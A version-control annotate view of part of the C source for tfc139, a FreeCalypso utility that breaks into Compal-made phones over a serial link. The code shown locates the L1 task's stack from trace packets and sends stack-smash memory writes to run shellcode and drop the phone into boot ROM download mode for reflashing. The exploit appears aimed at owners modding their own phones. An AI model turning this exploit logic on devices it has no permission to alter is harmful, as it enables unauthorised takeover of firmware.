Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
179 }
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
180 open_target_serial(argv[optind]);
418
a9bf3e92a30c tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 361
diff changeset
181 target_tty_port = argv[optind];
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
182
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
183 set_serial_nonblock(0);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
184 setlinebuf(stdout);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
185 if (logfname) {
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
186 logF = fopen(logfname, "w");
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
187 if (!logF) {
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
188 perror(logfname);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
189 exit(1);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
190 }
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
191 setlinebuf(logF);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
192 fprintf(logF, "*** Log of TFC139 break-in session ***\n");
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
193 }
361
62f850da5d49 tfc139: log timestamp buglet
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 360
diff changeset
194 time(&logtime);
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
195 if (stack_smash_addr)
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
196 initiate_breakin();
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
197 else
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
198 send_memcheck_query();
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
199 for (;;) {
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
200 FD_ZERO(&fds);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
201 FD_SET(target_fd, &fds);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
202 c = select(target_fd+1, &fds, 0, 0, 0);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
203 time(&logtime);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
204 if (c < 0) {
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
205 if (errno == EINTR)
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
206 continue;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
207 perror("select");
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
208 exit(1);
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
209 }
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
210 if (FD_ISSET(target_fd, &fds))
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
211 process_serial_rx();
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
212 }
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
213 }
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
214
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
215 static void
975
0d7cc054ef72 rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 432
diff changeset
216 handle_tm_response()
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
217 {
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
218 char msgbuf[80];
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
219
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
220 if (!breakin_in_progress) {
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
221 output_line("TM response unexpected at this time");
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
222 return;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
223 }
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
224 if (rxpkt_len != 4 || rxpkt[1] != 0x40 || rxpkt[2] || rxpkt[3] != 0x40){
975
0d7cc054ef72 rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 432
diff changeset
225 output_line("TM response differs from expected");
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
226 return;
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
227 }
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
228 sprintf(msgbuf, "Sending stack smash write at 0x%x", stack_smash_addr);
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
229 output_line(msgbuf);
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
230 send_compal_memwrite(stack_smash_addr, stack_smash_payload, 4);
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
231 stack_smash_addr += 4;
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
232 }
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
233
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
234 static void
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
235 analyze_gpf_packet()
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
236 {
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
237 unsigned stackbase, untouched;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
238 static char format[] =
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
239 "Name:L1 Stat:%*s Count:%*s Prio:%*s Stack:%x Size:%*s Untouched:%u";
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
240 char msgbuf[80];
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
241
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
242 if (rxpkt_len < 17 || rxpkt_len > 128)
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
243 return;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
244 /* it needs to be a trace packet */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
245 if ((rxpkt[1] & 0xF0) != 0xA0)
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
246 return;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
247 /* check the length */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
248 if (rxpkt[2] + 4 != rxpkt_len)
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
249 return;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
250 if (rxpkt[3])
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
251 return;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
252 /* skip timestamp, check src and dest */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
253 if (strncmp(rxpkt + 8, "SYSTPCO ", 8))
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
254 return;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
255 /* terminating NUL for sscanf */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
256 rxpkt[rxpkt_len] = '\0';
985
8109185528c1 tfc139: new logic actually works
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 984
diff changeset
257 if (sscanf(rxpkt + 16, format, &stackbase, &untouched) != 2)
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
258 return;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
259 /* success! */
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
260 sprintf(msgbuf,
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
261 "Parsed L1 stack location: base=0x%x, untouched=%u (0x%x)",
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
262 stackbase, untouched, untouched);
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
263 output_line(msgbuf);
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
264 if (stackbase & 3) {
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
265 output_line("Error: stack base address is not word-aligned");
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
266 exit(1);
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
267 }
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
268 untouched &= ~3;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
269 if (!shellcode_load_addr) {
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
270 if (untouched < sizeof shellcode) {
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
271 output_line("Error: not enough room for shellcode");
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
272 exit(1);
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
273 }
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
274 shellcode_load_addr = stackbase;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
275 }
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
276 stack_smash_addr = stackbase + untouched;
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
277 initiate_breakin();
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
278 }
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
279
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
280 handle_rx_packet()
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
281 {
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
282 if (rxpkt_len == 2 && rxpkt[0] == 'O' && rxpkt[1] == 'K') {
418
a9bf3e92a30c tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 361
diff changeset
283 output_line(
a9bf3e92a30c tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 361
diff changeset
284 "Success: target should now be in boot ROM download wait");
a9bf3e92a30c tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 361
diff changeset
285 printf("You can now run fc-loadtool -h compal -c none %s\n",
a9bf3e92a30c tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 361
diff changeset
286 target_tty_port);
a9bf3e92a30c tfc139: clean exit on success
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 361
diff changeset
287 exit(0);
360
f9d78057d766 tfc139 hack works!
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents: 359
diff changeset
288 }
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
289 switch (rxpkt[0]) {
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
290 case RVT_RV_HEADER:
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
291 if (rxpkt_len < 6)
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
292 goto unknown;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
293 print_rv_trace();
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
294 return;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
295 case RVT_L1_HEADER:
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
296 print_l1_trace();
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
297 return;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
298 case RVT_L23_HEADER:
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
299 print_g23_trace();
984
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
300 if (!breakin_in_progress)
8c83777f856c tfc139 reworked for the new "universal" break-in method
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 983
diff changeset
301 analyze_gpf_packet();
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
302 return;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
303 case RVT_TM_HEADER:
975
0d7cc054ef72 rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 432
diff changeset
304 print_tm_output_raw();
0d7cc054ef72 rvinterf/lowlevel: updates for the new knowledge of TM predating ETM
Mychaela Falconia <falcon@ivan.Harhan.ORG>
parents: 432
diff changeset
305 handle_tm_response();
359
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
306 return;
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
307 default:
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
308 unknown:
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
309 print_unknown_packet();
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
310 }
144b5d222de8 tfc139 hack utility started, compiles
Michael Spacefalcon <msokolov@ivan.Harhan.ORG>
parents:
diff changeset
311 }